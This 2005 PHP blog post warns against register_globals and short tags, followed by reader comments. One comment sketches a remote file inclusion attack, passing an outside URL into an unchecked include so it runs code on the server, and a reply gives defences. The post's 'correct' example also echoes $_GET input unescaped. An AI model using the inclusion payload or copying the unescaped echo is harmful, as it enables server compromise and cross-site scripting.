marnik.org

Good PHP practice

Wednesday 9 February 2005 om 01u36

php

Today, I spent my precious time explaining to someone why “register_globals” and “short_open_tags” are evil. Well, they’re not standard! Don’t us it! Turn them off!

register_globals
When “register_globals” is turned on, and you click on
http://www.mysite.com/page.php?id=10
you could do this on page.php

<?php
echo ‘The id is ‘ . $id;
?>

and it would output “10″.

NEVER USE THIS! IT IS BAD CODE!

What you should use is this

<?php
echo ‘The id is ‘ . $_GET[‘id’];
?>

and turn “register_globals” off. Why? When you migrate your script to a decent server with the right options, and you don’t use the right code, it simply Wont Work ™.

Gepost in: Dev

11 Commentaren Zelf commentaar toevoegen

1. wapi | Friday 11 February 2005 om 19u58 |

Even more simplier: use PHP version < = 4.2.0 and u HAVE to use $HTTP_GET VARS everywhere, the ‘$var’ statement won’t even work.

Of course not a solution…
2. wapi | Friday 11 February 2005 om 19u59 |

dunno why my comment broke off, but i wanted to say: “use version lower than 4.2.0 and u just HAVE tou use $HTTP_GET_VARS. ‘$var’ simply wont work at all. not a decent solution of course
3. jesus_ | Sunday 13 February 2005 om 00u49 |

Indeed, it’s evil. You should use what the manual tells you to use. And that is NEVER $var.

On the other hand, I doubt using old PHP-versions is the solution. PHP5 is a pleasure to code in, you won’t see me going back to 4.2
4. wap | Friday 18 February 2005 om 12u43 |

in PHP5 you can’t exlude includes (…) from including external pages

example: index.php?foo=bar

index.php: include (’$foo’)

call; index.php?foo=http://www.foo.com/bar.c

with some more commands, shell execution is possible on the server.
Or am i wrong here.?

PHP versions prior to 5 could block this option.

and file_exists can handle remote files in php5, where php4 couldn’t do this (so hack won’t work in php4 when using file_exist)

Anyway, php rules
5. jesus_ | Friday 18 February 2005 om 17u50 |

There are many ways to prevent this. First of all, you should use a switch case to make sure nothing you don’t want to happen happens. Example:
switch($_GET['foo']) { case 'a.php': include('a.php'); break; case 'b.php': include('b.php'); break; default: die('Don't try to hack teh script!'); }

Also, including external files is only possible when (and I quote)

If “URL fopen wrappers” are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper - see Appendix L for a list of protocols) instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using a URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file’s variable scope; the script is actually being run on the remote server and the result is then being included into the local script.

So turn off allow_url_fopen and you’re safe too. Those are 2 ways I can come up with from the top of my head, there are more.
6. wapi | Friday 18 February 2005 om 19u49 |

Nice

tx for clarification
1st option is a bit of a big workaround, consider big module based apps like phpnuke…

2nd option i like better, but sometimes it comes in real handy to include an external page. An iframe sux. But then again, its better to be safe then to be easy (or how else can i say this? :p)
7. jesus_ | Saturday 19 February 2005 om 13u25 |

At your service
I’ll get a php syntax highlighter soon for comments and posts like this.
8. wap | Tuesday 1 March 2005 om 09u08 |
Gepost met Firefox 1.0.1 op Windows XP

here’s a nice one if you’d care
9. jesus_ | Tuesday 1 March 2005 om 10u05 |
Gepost met Firefox 1.0 op Ubuntu Linux

Thanks, I’ll have a look.
10. kamil | Saturday 26 March 2005 om 19u09 |
Gepost met Internet Explorer 5.0 op Windows 98

dag niki
11. jesus_ | Saturday 26 March 2005 om 19u17 |
Gepost met Firefox 1.0 op Ubuntu Linux

*looks around*

Niki?